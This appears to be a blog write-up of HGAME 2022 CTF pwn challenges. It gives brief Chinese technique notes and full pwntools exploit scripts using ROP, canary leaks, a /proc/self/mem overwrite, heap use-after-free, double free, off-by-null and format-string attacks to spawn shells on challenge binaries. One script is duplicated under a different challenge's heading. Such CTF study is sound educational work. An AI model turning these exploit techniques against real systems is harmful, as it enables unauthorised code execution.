triplewings

2022hgamectf

2022-02-28 · 23 min read
pwn_game

2022的重置更新,就从这里开始吧~

week1

gdb

  • 触发gets漏洞,拿到shell
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
# p = remote("chuj.top", 50684)
p = process("./a.out")
p.recvuntil(b"word")

payload = p64(0xb0361e0e8294f147) + p64(0x8c09e0c34ed8a6a9)

p.send(payload)

p.recvuntil(b"\x7f")
p.recv(2)
canary = u64(p.recv(8))
print(hex(canary))
p.send(b"a"*24 + p64(canary) + b"a"*8 + p64(0x401256))
p.interactive()

pwn_land1

  • baby rop,改puts
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

p = process("./a.out")
# p = remote("chuj.top", 31470)
libc = ELF("libc-2.31.so")

pop_rdi = 0x0000000000401313
pop_rsi_r15 = 0x0000000000401311
puts_got = 0x404020
puts_plt = 0x401090

payload = b"a"*44 + b"\x2c" + b"\x00"*3 + b"a"*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x4011B6) + b"\n"
# gdb.attach(p, "b *0x4011B6")
p.send(payload)
p.recvuntil(b"\n")
libc.address = u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))  - libc.sym["puts"]
print(hex(libc.address))

sh = libc.search(b'/bin/sh').__next__()
system = libc.sym['execv']

payload2 = b"b"*44 + b"\x2c" + b"\x00"*3 + b"c"*8 + p64(pop_rsi_r15) + p64(0)*2 +p64(pop_rdi) + p64(sh) +p64(system) + b"\n"

p.send(payload2)

p.interactive()

pwn_land2

  • 利用多线程canary和tls离stack近的特点覆盖canary
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

p = process("./a.out")
# p = remote("chuj.top", 31470)
libc = ELF("libc-2.31.so")

pop_rdi = 0x0000000000401313
pop_rsi_r15 = 0x0000000000401311
puts_got = 0x404020
puts_plt = 0x401090

payload = b"a"*44 + b"\x2c" + b"\x00"*3 + b"a"*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x4011B6) + b"\n"
# gdb.attach(p, "b *0x4011B6")
p.send(payload)
p.recvuntil(b"\n")
libc.address = u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))  - libc.sym["puts"]
print(hex(libc.address))

sh = libc.search(b'/bin/sh').__next__()
system = libc.sym['execv']

payload2 = b"b"*44 + b"\x2c" + b"\x00"*3 + b"c"*8 + p64(pop_rsi_r15) + p64(0)*2 +p64(pop_rdi) + p64(sh) +p64(system) + b"\n"

p.send(payload2)

p.interactive()

orw

  • ban了openat,用getsdent64读取目录,然后正常orw
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = process("vuln")
p = remote("chuj.top", 41765)
libc = ELF("libc-2.31.so")

def proof(y):
    may = string.ascii_letters+string.digits
    for i in may:
        for j in may:
            for k in may:
                for l in may:
                    res = i +j +k +l
                    if hashlib.sha256((res).encode()).hexdigest() == y:
                        p.sendline(res)
                        return
    print('Wrong!')


p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)

p.recvuntil("size?")

p.sendline("-1")

p.recvuntil("content?")

# gdb.attach(p, "b *0x401311")

pop_rdi = 0x0000000000401443
pop_rsi_r15 = 0x0000000000401441
write_got = 0x404018
write_plt = 0x401080

main = 0x401311
leave = 0x4013DB
read_plt = 0x4010A0
bss = 0x404060 + 0x100

payload = b"a"*40 + p64(0xffffffffffffffff) + p64(bss)
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss) + p64(0) + p64(read_plt) + p64(main)
p.send(payload)
p.recvuntil("done!")
payload2 = p32(main) + b"\x00"*2
p.send(payload2)
p.recvuntil("size?\n")

p.sendline(b"-1")

p.recvuntil("content?")

payload = b"a"*40 + p64(0xffffffffffffffff) + p64(bss-0x8)
payload += p64(pop_rsi_r15) + p64(write_got) + p64(0) + p64(write_plt) + p64(leave) + p64(main)


p.send(payload)

libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))  - libc.sym["write"]


print(hex(libc.address))

p.recvuntil("size?")

p.sendline("-1")

p.recvuntil("content?")

libc_pop_rax = 0x000000000004a550
libc_pop_rax_rdx_rbx = 0x0000000000162865
libc_pop_rdx_r12 = 0x000000000011c371
libc_pop_rcx = 0x000000000009f822

payload = b"./" + b"\x00"*14 + b"a"*0x18 + p64(0xffffffffffffffff) + b"a"*8
payload += p64(libc.address + libc_pop_rax_rdx_rbx) + p64(2) + p64(0) + p64(0) + p64(pop_rdi) + p64(0x404130) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(libc.sym["alarm"] + 9)

payload += p64(pop_rdi) + p64(3) + p64(pop_rsi_r15) + p64(0x404280) + p64(0)
payload += p64(libc_pop_rdx_r12 + libc.address) + p64(0x200) + p64(0) 
payload += p64(libc_pop_rcx + libc.address) +p64(0x404280 + 0x200)
payload += p64(libc.sym["getdents64"])

payload += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(0x404280) + p64(0) + p64(libc_pop_rdx_r12 + libc.address) + p64(0x200) + p64(0) + p64(libc.sym["write"]) + p64(main)


p.send(payload)
p.recvuntil(b"done")
p.recvuntil(b"flag")
tail = p.recv(20)


# tail = b"a74248296b5d7f3d2b01"

p.recvuntil("size?")

p.sendline("-1")

p.recvuntil("content?")

payload = b"./flag" + tail + b"\x00"*6 + b"a"*8 + p64(0xffffffffffffffff) + b"a"*8
payload += p64(libc.address + libc_pop_rax_rdx_rbx) + p64(2) + p64(0) + p64(0) + p64(pop_rdi) + p64(0x404228) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(libc.sym["alarm"] + 9)
payload += p64(pop_rdi) + p64(4) + p64(pop_rsi_r15) + p64(bss- 0xc0) + p64(0) + p64(libc.address+libc_pop_rdx_r12) + p64(0x100) + p64(0)
payload += p64(libc.sym["read"])
payload += p64(pop_rdi) + p64(1) + p64(libc.sym["write"])

p.sendline(payload)

p.interactive()

week2

blind

访问 proc/self/mem 即可修改当前进程的内存, .text 段也是可修改的

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

p = remote("chuj.top", 51808)
libc = ELF("./libc.so.6")

def proof(y):
    may = string.ascii_letters+string.digits
    for i in may:
        for j in may:
            for k in may:
                for l in may:
                    res = i +j +k +l
                    if hashlib.sha256((res).encode()).hexdigest() == y:
                        p.sendline(res)
                        return
    print('Wrong!')


p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)

p.recvuntil("write: ")

libc.address = int(p.recvuntil('\n')[:-1], base = 16) - libc.sym["write"]
print(hex(libc.address))
p.sendlineafter(">> ", b'/proc/self/mem\x00')
p.sendlineafter(">> ", str(libc.sym["__libc_start_main"]))
payload = asm(shellcraft.sh())
payload = payload.rjust(0x300, asm('nop')) + b'\n'
p.sendafter(">> ", payload)

p.interactive()

oldfashion_note

uaf 2.31 打 fastbins

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

p = process("./note")
p = remote("chuj.top", 51445)
libc = ELF("./libc-2.31.so")

def proof(y):
    may = string.ascii_letters+string.digits
    for i in may:
        for j in may:
            for k in may:
                for l in may:
                    res = i +j +k +l
                    if hashlib.sha256((res).encode()).hexdigest() == y:
                        p.sendline(res)
                        return
    print('Wrong!')


p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)


def menu(i):
    p.sendlineafter(b"farewell", str(i))

def add(idx, size, content):
    menu(1)
    p.sendlineafter(b"index?", str(idx))
    p.sendlineafter(b"size?", str(size))
    p.sendafter(b"content?", content)

def show(idx):
    menu(2)
    p.sendlineafter(b"index?", str(idx))

def free(idx):
    menu(3)
    p.sendlineafter(b"index?", str(idx))


for i in range(8):
    add(i, 0x80, b"aaa")

for i in range(7):
    free(7-i)

free(0)
show(0)

libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 96 - 0x10 - libc.sym["__malloc_hook"]
print(hex(libc.address))

for i in range(8):
    add(i, 0x80, b"bbb")

for i in range(9):
    add(i, 0x20, b"ccc")

for i in range(8):
    free(8-i)

free(0)
free(1)

for i in range(2, 9):
    add(i, 0x20, b"ddd")

add(1, 0x20, p64(libc.sym["__free_hook"]))
add(0, 0x20, b"/bin/sh\x00")
add(1, 0x20, b"eee")
add(2, 0x20, p64(libc.sym["system"]))
free(0)



p.interactive()

echo sever

堆上的格式化字符串, 打reallocog填到malloc_hook

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

p = process("./echo")
p = remote("chuj.top", 52259)
libc = ELF("./libc-2.31.so")

def echo(length, content):
    p.sendlineafter(b"your content's length:", str(length))
    p.send(content)

def proof(y):
    may = string.ascii_letters+string.digits
    for i in may:
        for j in may:
            for k in may:
                for l in may:
                    res = i +j +k +l
                    if hashlib.sha256((res).encode()).hexdigest() == y:
                        p.sendline(res)
                        return
    print('Wrong!')


p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)


echo(0x450, b"%3$pzz")
p.recvuntil("\n>> ")
libc.address = int(p.recvuntil("zz")[:-2].decode(), 16) + 895550 - 0x10 - libc.sym["__malloc_hook"]
echo(0x450, b"%6$pzz")
p.recvuntil("\n>> ")
heap_0 = int(p.recvuntil("zz")[:-2].decode(), 16) - 0x10

echo(0x450, b"%4$pzz")
p.recvuntil("\n>> ")
heap_fastbins = int(p.recvuntil("zz")[:-2].decode(), 16)

print(hex(libc.address))
print(hex(heap_0))
print(hex(heap_0 & 0xff))
print(hex(heap_fastbins))
echo(0x450, b"aaa")
echo(0x3e0, b"aaa")
echo(0x370, b"aaa")
echo(0x300, b"aaa")
echo(0x290, b"aaa")
echo(0x220, b"aaa")
echo(0x1b0, b"aaa")
echo(0x140, b"aaa")
echo(0xd0, b"aaa")

echo(0x60, b"aaa")


echo(0x60, b"%" + str(heap_0 & 0xff).encode()  + b"c%6$hhn")
echo(0x60, b"%" + str((heap_fastbins + 0xe0) & 0xffff).encode()  + b"c%10$hn")

echo(0x60, p64(libc.sym["__free_hook"]))
echo(0, b"")

echo(0x60, b"aaa")
echo(0x60, b"%10$ln")
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")

echo(0x60, b"aaa")
echo(0x60, b"%10$ln")
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")


echo(0x60, b"%10$ln\x00\x00" + p64(0)*2 + p64(0x51))
echo(0x60, b"%96c%10$hhn" + b"\x00"*5 + p64(0)*7 + p64(0x41))
echo(0x30, p64(0)*3 + p64(0x71) + p64(libc.sym["__realloc_hook"] - 27))
echo(0x30, b"%10$ln")

echo(0x60, b"aaa")

echo(0x60, b"%10$ln")
# gdb.attach(p, "b *$rebase(0x129F)")
echo(0x60, b"%10$ln" + b"\x00"*5 + p64(0)*2 + p64(0) + p64(libc.address + 0xe6c81))
# echo(0x0, b"")
echo(0x0, b"aaa")
# %224c%4$hhn

p.interactive()

# 0xe6c7e execve("/bin/sh", r15, r12)
# constraints:
#   [r15] == NULL || r15 == NULL
#   [r12] == NULL || r12 == NULL

# 0xe6c81 execve("/bin/sh", r15, rdx)
# constraints:
#   [r15] == NULL || r15 == NULL
#   [rdx] == NULL || rdx == NULL

# 0xe6c84 execve("/bin/sh", rsi, rdx)
# constraints:
#   [rsi] == NULL || rsi == NULL
#   [rdx] == NULL || rdx == NULL

week3

changeable note

2.23 打stdout

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

p = process("./note")
p = remote("chuj.top", 52401)
libc = ELF("./libc-2.23.so")


def proof(y):
    may = string.ascii_letters+string.digits
    for i in may:
        for j in may:
            for k in may:
                for l in may:
                    res = i +j +k +l
                    if hashlib.sha256((res).encode()).hexdigest() == y:
                        p.sendline(res)
                        return
    print('Wrong!')


p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)

def menu(i):
    p.sendlineafter(b"4. farewell", str(i))

def add(idx, size, content):
    menu(1)
    p.sendlineafter(b"index?", str(idx))
    p.sendlineafter(b"size?", str(size))
    p.sendafter(b"content?", content)

def edit(idx, content):
    menu(2)
    p.sendlineafter(b"index?\n>> ", str(idx))
    p.sendline(content)

def free(idx):
    menu(3)
    p.sendlineafter(b"index?", str(idx))


add(0,0x30,b"aaa")
add(1,0x60,b"aaa")
add(2,0x60,p64(0)*5 + p64(0x41))
add(3,0x10,b"aaa")
add(4,0x10,b"aaa")

edit(1, p64(0)*9 + p64(0x21))
edit(0, p64(0)*7 + p64(0xe1))
free(1)
free(2)

add(5,0x40,b"aaa")
add(6,0x10,b"aaa")
add(7,0x20,b"\xdd\x25")
add(8,0x30,b"aaa")
edit(6, p64(0)*3 + b"\x71")
add(9, 0x60, b"\xdd\x25")
add(10, 0x60, b"\x00"*0x33 + p64(0xfbad1887) +p64(0)*3 + p8(0x88))
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - libc.sym['_IO_2_1_stdin_']
print(hex(libc.address))
edit(0, p64(0)*7 + p64(0xe1))
free(9)
free(5)
add(5,0x40,b"aaa")
add(6,0x10,b"aaa")
add(7,0x20,p64(libc.sym["__malloc_hook"] - 0x23))
add(8,0x30,b"aaa")
edit(6, p64(0)*3 + b"\x71")
add(9, 0x60, b"aaa")

add(10, 0x60, b"\x00"*3 + p64(0)*2 + p64(libc.address + 0xf03a4))

# gdb.attach(p, "b edit_note")
edit(6, p64(0)*3 + b"\x41")
free(9)


p.interactive()

# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

elder_note

double freemalloc_hook, double_free报错拿shell

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

p = process("./note")
p = remote("chuj.top", 52620)
libc = ELF("./libc-2.23.so")


def proof(y):
    may = string.ascii_letters+string.digits
    for i in may:
        for j in may:
            for k in may:
                for l in may:
                    res = i +j +k +l
                    if hashlib.sha256((res).encode()).hexdigest() == y:
                        p.sendline(res)
                        return
    print('Wrong!')


p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)

def menu(i):
    p.sendlineafter(b"4. farewell", str(i))

def add(idx, size, content):
    menu(1)
    p.sendlineafter(b"index?", str(idx))
    p.sendlineafter(b"size?", str(size))
    p.sendafter(b"content?", content)

def show(idx):
    menu(2)
    p.sendlineafter(b"index?", str(idx))

def free(idx):
    menu(3)
    p.sendlineafter(b"index?", str(idx))

add(0, 0x80, b"aaa")
add(1, 0x80, b"aaa")
free(0)
show(0)
p.recvuntil("")
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 88 - 0x10 - libc.sym["__malloc_hook"]


add(0, 0x80, b"aaa")
add(0, 0x60, b"aaa")
add(1, 0x60, b"aaa")
add(2, 0x60, b"/bin/sh")
free(0)
free(1)
free(0)
add(0, 0x60, p64(libc.sym["__malloc_hook"] - 0x23))

add(1, 0x60, b"aaa")
add(3, 0x60, b"aaa")
# gdb.attach(p, "b add_note")

print(hex(libc.address))
add(4, 0x60, b"aaa" + p64(0)*2 + p64(libc.address + 0xf03a4) + p64(0))
free(0)
free(0)
# free(2)

p.interactive()

# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

sized_note

off by null, unlink unsorted bins

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

p = process("./note")
p = remote("chuj.top", 52966)
libc = ELF("./libc.so.6")


def proof(y):
    may = string.ascii_letters+string.digits
    for i in may:
        for j in may:
            for k in may:
                for l in may:
                    res = i +j +k +l
                    if hashlib.sha256((res).encode()).hexdigest() == y:
                        p.sendline(res)
                        return
    print('Wrong!')


p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)

def menu(i):
    p.sendlineafter(b"5. farewell", str(i))

def add(idx, size, content):
    menu(1)
    p.sendlineafter(b"index?", str(idx))
    p.sendlineafter(b"size?", str(size))
    p.sendafter(b"content?", content)

def edit(idx, content):
    menu(4)
    p.sendlineafter(b"index?\n>> ", str(idx))
    p.send(content)

def free(idx):
    menu(3)
    p.sendlineafter(b"index?", str(idx))

def show(idx):
    menu(2)
    p.sendlineafter(b"index?", str(idx))





add(0, 0xf8, b"aaa")
add(1, 0x88, b"aaa")
add(2, 0xf8, b"aaa")
add(3, 0x88, b"aaa")

for i in range(7):
    add(4+i, 0xf8, b"aaa")

for i in range(7):
    free(10 - i)

free(1)
free(0)

add(1, 0x88, b"a"*0x80+p64(0x90+0x100))
free(2)

for i in range(7):
    add(4+i, 0xf8,"/bin/sh\x00")
add(0, 0xf8,"cccc")
show(1)
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 96 - 0x10 - libc.sym['__malloc_hook']
print(hex(libc.address))
# gdb.attach(p, "b *$rebase(0x144B)")
add(2, 0x88,"cccc")
free(2)
edit(1, p64(libc.sym["__free_hook"])[:-1])
add(13, 0x88, p64(libc.sym["__free_hook"]))

add(14, 0x88, p64(libc.sym["system"]))
free(5)



p.interactive()

# 0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
#   rsp & 0xf == 0
#   rcx == NULL

# 0x4f432 execve("/bin/sh", rsp+0x40, environ)
# constraints:
#   [rsp+0x40] == NULL

# 0x10a41c execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

week4

vector

  • 了解vector的申请原理,制造double_free
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

p = process("./vector")
# p = remote("chuj.top", 51445)
libc = ELF("./libc.so.6")

# def proof(y):
#     may = string.ascii_letters+string.digits
#     for i in may:
#         for j in may:
#             for k in may:
#                 for l in may:
#                     res = i +j +k +l
#                     if hashlib.sha256((res).encode()).hexdigest() == y:
#                         p.sendline(res)
#                         return
#     print('Wrong!')


# p.recvuntil(b" == ")
# a = p.recvuntil(b"\n")[:-1].decode()
# print(a)
# proof(a)

def menu(i):
    p.sendlineafter(b"farewell", str(i))

def add(idx, size, content):
    menu(1)
    p.sendlineafter(b"index?", str(idx))
    p.sendlineafter(b"size?", str(size))
    p.sendafter(b"content?", content)

def show(idx):
    menu(3)
    p.sendlineafter(b"index?", str(idx))

def free(idx):
    menu(4)
    p.sendlineafter(b"index?", str(idx))

def move(f, t):
    menu(5)
    for i in range(f):
        p.sendlineafter("[1/0]\n>> ", b"0")
    p.sendlineafter("[1/0]\n>> ", b"1")
    p.sendlineafter(">>", str(t))



for i in range(8):
    add(i, 0x100, b"aaaa")

for i in range(8,10):
    add(i, 0x70, b"aaaa")

for i in range(1,8):
    free(i)

free(0)
add(0, 0x50, b'aaaaaaaa')
show(0)
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - libc.sym["__malloc_hook"] - 0x170
print(hex(libc.address))

for i in range(1, 8):
    add(i, 0x70, b'aaa')

move(2, 17)
add(10, 0x70, b'idx:10')
for i in range(3, 10):
    free(i)

free(2)
free(10)
free(17)
for i in range(2, 9):
    add(i, 0x70, '\n')
add(9, 0x70, p64(libc.sym["__free_hook"]))
add(11, 0x70, b'pass\n')
add(12, 0x70, b'/bin/sh\x00\n')
add(17, 0x70, p64(libc.sym["system"]))
free(12)

gdb.attach(p)
p.interactive()
RSS